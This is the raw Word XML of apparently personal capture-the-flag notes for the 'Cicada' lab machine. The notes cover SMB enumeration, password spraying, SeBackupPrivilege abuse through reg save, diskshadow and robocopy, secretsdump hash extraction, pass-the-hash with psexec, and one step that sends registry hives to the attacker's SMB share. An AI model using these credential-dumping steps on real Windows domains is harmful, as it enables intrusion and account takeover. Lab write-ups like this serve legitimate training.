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4B7DBC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453CB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cicade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A9EC3C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53CB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53CB4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453CB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53CB4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453CB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53CB4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453CB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53CB4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89FF7B2" w:rsidR="00843DCE" w:rsidRDefault="00207A7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‘.’ -p ‘’ - -shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D36E6B" w14:textId="1512D1E6" w:rsidR="00207A76" w:rsidRDefault="00E4488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‘.’//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/HR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9EA47" w14:textId="5A33A0A8" w:rsidR="00AC5BB8" w:rsidRDefault="00E4488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“hr.txt”</w:t>
      </w:r>
      <w:r w:rsidR="00620EDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00620EDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passworf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E1D047E" w14:textId="4F13F911" w:rsidR="00620EDE" w:rsidRDefault="00620EDE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‘.’ -p ‘’ - -rid-brute = all the users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0F096" w14:textId="5CB1E018" w:rsidR="00687FF4" w:rsidRDefault="00687FF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save to the list with type user only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BD772" w14:textId="6BF77FAF" w:rsidR="00687FF4" w:rsidRDefault="00687FF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user.txt -p ‘paste’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821850C" w14:textId="3369CE16" w:rsidR="00687FF4" w:rsidRDefault="00687FF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a username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47135D" w14:textId="253A1FBE" w:rsidR="00687FF4" w:rsidRDefault="00687FF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</w:t>
      </w:r>
      <w:r w:rsidR="00B5479B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:r w:rsidR="00B5479B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chael.wringthson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B5479B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’ -p ‘paste’ - -shares = we obtain shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166DAF3" w14:textId="02700325" w:rsidR="00B5479B" w:rsidRDefault="00B5479B" w:rsidP="00B5479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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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machael.wringthson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‘paste’ - -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B93038" w14:textId="53D45317" w:rsidR="00B5479B" w:rsidRDefault="00B5479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password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David.orelious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3A7C923" w14:textId="3BDCA0B9" w:rsidR="00687FF4" w:rsidRDefault="00B5479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david.orelious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‘new’ - -shares = now we obtain the DEV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D4FF8" w14:textId="0753E153" w:rsidR="00B5479B" w:rsidRDefault="00B5479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cicade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David.orelious%new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/DEV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62956F9B" w14:textId="0BB8A106" w:rsidR="00B5479B" w:rsidRDefault="00B5479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xx.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5B64C" w14:textId="42DF0C86" w:rsidR="00B5479B" w:rsidRDefault="00B5479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xx.ps1 = we obtain the new id and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE9842" w14:textId="77777777" w:rsidR="005F58CB" w:rsidRDefault="005F58CB" w:rsidP="005F58C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its work </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DDE07" w14:textId="6F8B3F0C" w:rsidR="00687FF4" w:rsidRDefault="00E77DEA" w:rsidP="005F58C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32F6B727" w14:textId="77777777" w:rsidR="008C12D5" w:rsidRDefault="008C12D5" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E003E1" w14:textId="7F372E86" w:rsidR="00FF6643" w:rsidRDefault="00FF664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 = </w:t>
      </w:r>
      <w:r w:rsidR="0034454E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we see </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0034454E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeBackupPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0034454E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0034454E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeRestorePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35CE4640" w14:textId="4D57A09F" w:rsidR="006E51BF" w:rsidRDefault="00D333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reg save HKLM\SAM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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="363F0587" w14:textId="054C9400" w:rsidR="00D333C0" w:rsidRDefault="004E3B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reg save HKLM\SYSTEM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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7278550C" w14:textId="43E43152" w:rsidR="004E3B99" w:rsidRDefault="00C63F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download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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04BEB76E" w14:textId="4C476C1E" w:rsidR="00C63F96" w:rsidRDefault="00C63F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download system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3858712F" w14:textId="108F927D" w:rsidR="00C63F96" w:rsidRDefault="00C63F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107C6B18" w14:textId="44E9AF8A" w:rsidR="00C63F96" w:rsidRDefault="00C63F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secretdump.py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obtain the administrator hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106ABED" w14:textId="31903482" w:rsidR="00C63F96" w:rsidRDefault="00A850A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work so just do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psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CC46CF8" w14:textId="2558024E" w:rsidR="00A850A6" w:rsidRDefault="00A850A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root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7A94A" w14:textId="77777777" w:rsidR="00D333C0" w:rsidRDefault="00D333C0" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B5089A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583BCD2D" w14:textId="253E81AC" w:rsidR="00AC5BB8" w:rsidRDefault="00C93FFE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 = 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SeBackupPrivilege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SeRestorePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AB26EB7" w14:textId="7272683F" w:rsidR="00AC5BB8" w:rsidRDefault="00C93FF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reg save HKLM\SYSTEM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in shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43FB3C" w14:textId="25F3F4D5" w:rsidR="00AC5BB8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our terminal create diskshadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C094A6B" w14:textId="1B78D63F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verbose on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F082830" w14:textId="37719528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metadata C:\Windows\Temp\meta.cab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E81D91" w14:textId="5952D5FC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set context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clientaccessible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36DCEDB2" w14:textId="687EAAB6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context persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53963731" w14:textId="6A141484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begin backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AA78C" w14:textId="4E9AAA87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add volume C: alias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cdrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F75073D" w14:textId="58822F32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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255BF527" w14:textId="42C1D6DB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expose %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cdrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% E:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732CE9BD" w14:textId="1AF01F33" w:rsidR="007F72C6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backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D9E8D" w14:textId="7EBF94BF" w:rsidR="00AC5BB8" w:rsidRDefault="007F72C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save it to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497066C5" w14:textId="7823663F" w:rsidR="0003013D" w:rsidRDefault="009B1F2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unix2dos diskshadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD5B1F" w14:textId="16E0F0EF" w:rsidR="007F72C6" w:rsidRDefault="00C355D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upload dishshadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAD64A" w14:textId="1ECB0FF4" w:rsidR="00C355D1" w:rsidRDefault="00C355D1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diskshadow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/s diskshadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340ECBB7" w14:textId="7870C46A" w:rsidR="009B1F2F" w:rsidRDefault="0003013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robocopy /b E:\Windows\ntds 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</w:p>
    <w:p w14:paraId="2141FFA8" w14:textId="6F1E9402" w:rsidR="006C7DDD" w:rsidRDefault="006C7D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created = download it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E16B3F" w14:textId="12178E10" w:rsidR="006C7DDD" w:rsidRDefault="006C7D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secretsdump.py local -system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ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AA3B8C4" w14:textId="7E3C867F" w:rsidR="006C7DDD" w:rsidRDefault="006C7D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hash for administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F821250" w14:textId="28B9C480" w:rsidR="00AC5BB8" w:rsidRDefault="007F3B1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psexec.py -hashes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paste:paste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administrator@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050004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7DE9302" w14:textId="100CDE89" w:rsidR="00AC5BB8" w:rsidRDefault="005000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23.19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cicade</w:t>
      </w:r>
      <w:r w:rsidR="00712B99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59A2A97F" w14:textId="54990A2D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 administrator Password1&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D4EC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5CCF10D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319D0191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372DA20B" w14:textId="78A1B3AE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</w:p>
    <w:p w14:paraId="762C8A42" w14:textId="5C48C816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301FBA70" w14:textId="7C75CC39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impacket-smbserver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-smb2support share $(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pwd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14:paraId="5500FE2A" w14:textId="721E4624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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00087D56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 xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4279E654" w14:textId="283FBC18" w:rsidR="00087D56" w:rsidRDefault="00087D5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reg.py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cicada.htb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/Emily.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oscars:pasword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’@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backup -o 10.10.14.56/share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE779D" w14:textId="731BB9E5" w:rsidR="00087D56" w:rsidRDefault="00B8786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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87863">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C533469" w14:textId="116914D0" w:rsidR="00B87863" w:rsidRDefault="00B8786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ls = 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SAM.save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SYSTEM.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59D847CA" w14:textId="2FDFADEB" w:rsidR="00B87863" w:rsidRDefault="00EF2A8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5 min mostly 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2A8C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 xml:space="preserve"> terminal provides us the error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6D46A" w14:textId="31C5E4A2" w:rsidR="00EF2A8C" w:rsidRDefault="00EF2A8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secretsdump.py local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SAM.save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-system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SYSTEM.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B4A57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = administrator hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10979409" w14:textId="77777777" w:rsidR="00D96BBB" w:rsidRDefault="00D96BBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8FB55C" w14:textId="77777777" w:rsidR="00D96BBB" w:rsidRDefault="00D96BBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F54577F" w14:textId="77777777" w:rsidR="00D96BBB" w:rsidRDefault="00D96BBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E27185" w14:textId="77777777" w:rsidR="00D96BBB" w:rsidRDefault="00D96BBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319AAC72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5BCC8614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5AE1768F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94EE565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5DBBEE3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70F53F0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4ABA45E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133EC7B9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6DFC892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5810E65E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2E2BD1B4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66941725" w14:textId="77777777" w:rsidR="00AC5BB8" w:rsidRDefault="00AC5BB8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3013D"/>
    <w:rsid w:val="00087D56"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00207A76"/>
    <w:rsid w:val="002B4A57"/>
    <w:rsid w:val="0034454E"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004501C9"/>
    <w:rsid w:val="00453CB4"/>
    <w:rsid w:val="004E3B99"/>
    <w:rsid w:val="00500046"/>
    <w:rsid w:val="005F58CB"/>
    <w:rsid w:val="00620EDE"/>
    <w:rsid w:val="00687FF4"/>
    <w:rsid w:val="006C7DDD"/>
    <w:rsid w:val="006E51BF"/>
    <w:rsid w:val="00712B99"/>
    <w:rsid w:val="007569A7"/>
    <w:rsid w:val="007F3B1F"/>
    <w:rsid w:val="007F72C6"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008C12D5"/>
    <w:rsid w:val="008C7E70"/>
    <w:rsid w:val="009273AD"/>
    <w:rsid w:val="009B1F2F"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A850A6"/>
    <w:rsid w:val="00AC5BB8"/>
    <w:rsid w:val="00B5479B"/>
    <w:rsid w:val="00B87863"/>
    <w:rsid w:val="00C355D1"/>
    <w:rsid w:val="00C63F96"/>
    <w:rsid w:val="00C93FFE"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D333C0"/>
    <w:rsid w:val="00D96BBB"/>
    <w:rsid w:val="00E44883"/>
    <w:rsid w:val="00E77DEA"/>
    <w:rsid w:val="00EF2A8C"/>
    <w:rsid w:val="00F3685E"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F64D7D"/>
    <w:rsid w:val="00F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FE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39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T09:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>